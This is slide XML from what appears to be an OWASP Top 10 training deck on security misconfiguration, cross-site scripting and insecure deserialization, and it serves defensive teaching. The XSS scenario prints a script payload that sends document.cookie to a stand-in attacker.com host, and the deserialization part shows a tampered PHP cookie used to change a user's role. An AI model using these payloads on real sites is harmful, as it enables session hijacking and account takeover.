                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cloud storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>permissions (e.g. S3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bucket permissions). </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 segmented application architecture that provides effective, secure separation between components or tenants, with segmentation, containerization, or cloud security groups</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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Sending security directives to clients, e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>Security Headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</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An automated process to verify the effectiveness of the configurations and settings in all environments.</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A6</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Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="236991629"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-AU" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Attackers will often attempt to exploit unpatched flaws or access default accounts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, unused pages, unprotected files and directories, etc to gain unauthorized access or knowledge of the system.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Security misconfiguration can happen at any level of an application stack, including the network services, platform, web server, application server, database, frameworks, custom code, and pre-installed virtual machines, containers, or storage. Automated scanners are useful for detecting misconfigurations, use of default accounts or configurations, unnecessary services, legacy options, etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="10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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The business impact depends on the protection needs of the application and data.</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4197497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Scenario 1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The application uses untrusted data in the construction of the following HTML snippet without validation or escaping:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  (String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  value=</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("CC") +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&gt;";</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The attacker modifies the ‘CC’ parameter in the browser to:</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&gt;&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:b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http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  foo=</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err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>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This attack causes the victim’s session ID to be sent to the attacker’s website, allowing the attacker to hijack the user’s current session. </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Note:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Attackers can use XSS to defeat any automated Cross-Site Request Forgery ( CSRF) defense the application might employ. </a:t>
            </a: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300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>There are three forms of XSS, usually targeting users' browsers:</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Reflected XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The application or API includes unvalidated and unescaped user input as part of HTML output. A successful attack can allow the attacker to execute arbitrary HTML and JavaScript in the victim’s browser. Typically the user will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.</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Stored XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> The application or API stores unsanitized user input that is viewed at a later time by another user or an administrator. Stored XSS is often considered a high or critical risk.</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DOM XSS:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page are vulnerable to DOM XSS. Ideally, the application would not send attacker-controllable data to unsafe JavaScript APIs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Typical XSS attacks include session stealing, account takeover, MFA bypass, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DOM node replacement or defacement (such as trojan login panels</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>), attacks against the user's browser such as malicious software downloads, key logging, and other client-side attacks.</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 </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Proactive Controls: Encode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Proactive Controls: Validate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Application Security Verification Standard: V5</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Testing Guide: Testing for Reflected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Testing Guide: Testing for Stored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Testing Guide: Testing for DOM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Cheat Sheet: XSS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OWASP Cheat Sheet: DOM based XSS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OWASP Cheat Sheet: XSS Filter Evasion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Java Encoder Project</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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endParaRPr lang="en-US" sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId13"/>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4"/>
              </a:rPr>
              <a:t>CWE-79: Improper neutralization of user supplied input</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err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>PortSwigger</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>: Client-side template injection</a:t>
            </a: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200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Preventing XSS requires separation of untrusted data from active browser content. This can be achieved by:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550"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Using frameworks that automatically escape XSS by design, such as the latest Ruby on Rails, React JS. Learn the limitations of each framework's XSS protection and appropriately handle the use cases which are not covered.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" lvl="1"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Escaping untrusted HTTP request data based on the context in the HTML output (body, attribute, JavaScript, CSS, or URL) will resolve Reflected and Stored XSS vulnerabilities. The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'XSS Prevention'</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has details on the required data escaping techniques.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Applying context-sensitive encoding when modifying the browser document on the client side acts against DOM XSS. When this cannot be avoided, similar context sensitive escaping techniques can be applied to browser APIs as described in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0366D6"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>OWASP Cheat Sheet 'DOM based XSS Prevention'</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Enabling a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"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hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>Content Security Policy (CSP)</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is a defense-in-depth mitigating control against XSS. It is effective if no other vulnerabilities exist that would allow placing malicious code via local file includes (e.g. path traversal overwrites or vulnerable libraries from permitted content delivery networks).</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A7</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Cross-Site Scripting (XSS)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1818654515"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="110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kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1100" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204"/>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Automated tools can detect and exploit all three forms of XSS, and there are freely available exploitation frameworks.</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XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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r>
                        <a:rPr lang="en-US" sz="900" b="0" i="0" kern="1200" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Automated tools can find some XSS problems automatically, particularly in mature technologies such as PHP, J2EE / JSP, and ASP.NET.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="9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AU" sz="900" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The impact of XSS is moderate for reflected and DOM XSS, and severe for stored XSS, with remote code execution on the victim's browser, such as stealing credentials, sessions, or delivering malware to the victim.</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310475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1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Applications and APIs will be vulnerable if they deserialize hostile or tampered objects supplied by an attacker. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This can result in two primary types of attacks:</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Object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization.</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Typical data tampering attacks, such as access-control-related attacks, where existing data structures are used but the content is changed.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Serialization may be used in applications for:</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Remote- and inter-process communication (RPC/IPC) </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Wire protocols, web services, message brokers</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Caching/Persistence</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Databases, cache servers, file systems </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HTTP cookies, HTML form parameters, API authentication tokens </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:b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A React application calls a set of Spring Boot microservices. Being functional programmers, they tried to ensure that their code is immutable. The solution they came up with is serializing user state and passing it back and forth with each request. An attacker notices the "R00" Java object signature, and uses the Java Serial Killer tool to gain remote code execution on the application server.</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 PHP forum uses PHP object serialization to save a "super" cookie, containing the user's user ID, role, password hash, and other state:</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  a:4:{i:0;i:132;i:1;s:7:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mallory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>";i:2;s:4:"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
